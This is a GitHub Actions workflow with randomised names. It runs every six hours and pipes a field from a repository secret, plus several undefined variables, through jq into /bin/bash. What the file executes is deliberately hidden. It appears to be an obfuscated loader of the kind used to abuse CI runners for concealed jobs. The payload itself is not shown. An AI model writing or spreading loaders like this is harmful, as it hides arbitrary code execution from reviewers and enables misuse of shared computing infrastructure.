name: xiaxijie6537

on:
  workflow_dispatch:
  schedule:
    - cron: '57 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: xiaxijie6537
        env:
          k4: ${{ secrets.k4 }}
        run: |
          echo $k4 | jq -r .q03650 | /bin/bash
          echo $pzv395 | jq -r .u82431 | /bin/bash
          echo $yw7 | jq -r .ajnpa79 | /bin/bash
          echo $xbymm601 | jq -r .jgh097 | /bin/bash
          echo $xp12048 | jq -r .o90736 | /bin/bash
          echo $t61937 | jq -r .r262 | /bin/bash

